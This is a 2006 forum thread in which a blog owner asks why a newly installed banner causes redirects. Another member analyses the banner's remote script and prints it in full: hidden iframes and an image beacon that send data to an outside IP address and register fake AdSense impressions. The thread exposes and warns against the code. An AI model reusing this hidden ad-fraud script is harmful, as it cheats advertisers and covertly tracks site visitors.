Need some help, I have been hacked?

Discussion in 'Programming' started by jg123, Aug 30, 2006.

  1. #1
    I notice some sort of redirection going on when I go to my gadget blog can anyone please tell me why or how this is happening? The only recent code I installed is the banner in the header and I did notice it had javascript in it, is that what is causing my the redirects?

    Here was the code:
    I also noticed my traffic dropping quickly, I wonder it that was it too :-(

    thanks
     
    jg123, Aug 30, 2006 IP
  2. clancey

    clancey Peon

    Messages:
    1,099
    Likes Received:
    63
    Best Answers:
    0
    Trophy Points:
    0
    #2
    I visited the site and I was not redirected away. Perhaps my security settings prevent this from happening. Interestingly, I got a blank page at the URL for the code you inserted.

    Having said that, I would always want to study new code to make sure it does not contain anything I do not want. The first rule of thumb these days is never trust anyone and anything. They need to prove to you that they can be trusted.
     
    clancey, Aug 30, 2006 IP
  3. wmtips

    wmtips Well-Known Member

    Messages:
    601
    Likes Received:
    70
    Best Answers:
    1
    Trophy Points:
    150
    #3
    Wow! VERY interesting! It seems someone trying to cheat Adsense.. Do not use this code.

    Yes clancey, if you'll simple request http://www.eznearticles.com/adjs.php?109, you get a blank response. But if you will request it with "http://www.2bloggadgets.com/" as referer, you get an interesting javascript:

    
    <!--
    	document.write('<iframe id="I1" scrolling="no" frameborder=0 src="http://www.eznearticles.com/swop/articlemuse-swop.php?id=pub-7791659056872483&u=les.webbes-articlemuse&adserver=2bloggadgets.com&pct=0" width="12" height="6" style="visibility:hidden" ></iframe>');
    	document.write('<iframe id="I1" scrolling="no" frameborder=0 src="http://www.eznearticles.com/swop/articlemuse-swop.php?id=pub-7791659056872483&u=les.webbes-articlemuse&adserver=2bloggadgets.com&pct=0" width="12" height="6" style="visibility:hidden" ></iframe>');
    	document.write('<iframe id="I1" scrolling="no" frameborder=0 src="http://www.eznearticles.com/swop/articlemuse-swop.php?id=pub-7791659056872483&u=les.webbes-articlemuse&adserver=2bloggadgets.com&pct=0" width="12" height="6" style="visibility:hidden" ></iframe>');
    document.write("<A href=http://www.eznearticles.com/home-business/index.html><img src=http://www.eznearticles.com/images/beyourownboss.jpg ></A>");
    --> 
    
    
    Code (markup):
    Now let's explore response from http://www.eznearticles.com/swop/articlemuse-swop.php?id=pub-7791659056872483&u=les.webbes-articlemuse&adserver=2bloggadgets.com&pct=0:

     
    
    <script> 
    objImage = new Image();
    objImage.src='http://12.47.45.44/doogcount.php?f=objimg&adserver=2bloggadgets.com&xhost=les.webbes-articlemuse&sip='; 
    objImage = new Image(); 
    objImage.src='http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-7791659056872483&dt=1156949603100&lmt=1114452866&alternate_ad_url=&format=120x600&ad_type=text_image&output=html&url=http%3A%2F%2Fwww.articlemuse.com%2Fmiscellaneous%2Fcomputers%2F10-time-tested-tips-for-becoming-an-internet-expert.html&u_h=768&u_w=1024&u_ah=736&u_aw=1024&u_cd=8&u_tz=-420&u_his=74&u_java=true'; 
    </script>
    
    
    
    
    Code (markup):
    This code sends some info to the http://12.47.45.44/doogcount.php and makes "an impression" (ads are not shown) of google adsense ad (publisher ID ca-pub-7791659056872483). Hello, Adsense cheaters!

    How they make clicks (if make), I have not resolved.

    Conclusion: Never trust sites with name misspelled from the known site (ezinearticles.com vs eznearticles.com)!
     
    wmtips, Aug 30, 2006 IP
  4. jg123

    jg123 Notable Member

    Messages:
    6,006
    Likes Received:
    387
    Best Answers:
    0
    Trophy Points:
    295
    #4
    mmmm, so it is malicious code for sure. You won't be re-directed because I took the banner off. I thought it was just redirecting but it would make sense that it is somehow redirecting to adsense.

    wmtips so that publisher code is the one bennifting from this cheat script?

    I guess all the visitors to my site are probably peeved that they were redirected to crap they had no interest in. I will definately pursue this and try and get the person responsible's account banned from adsense.
     
    jg123, Aug 30, 2006 IP
  5. wmtips

    wmtips Well-Known Member

    Messages:
    601
    Likes Received:
    70
    Best Answers:
    1
    Trophy Points:
    150
    #5
    I don't see clicks in this code, it only performs an impressions for Adsense statistics. Maybe they are making reasonable CTR with this technique (i.e. show "impressions" for google and click in the other place)

    I don't see any redirects in this code, but as soon as it hosted on their server, the contents of javascript can be different from time to time.
     
    wmtips, Aug 30, 2006 IP
    jg123 likes this.
  6. jg123

    jg123 Notable Member

    Messages:
    6,006
    Likes Received:
    387
    Best Answers:
    0
    Trophy Points:
    295
    #6
    Yes, that must be it because it doesn't always redirect, I think it is controlled from elsewhere
     
    jg123, Aug 30, 2006 IP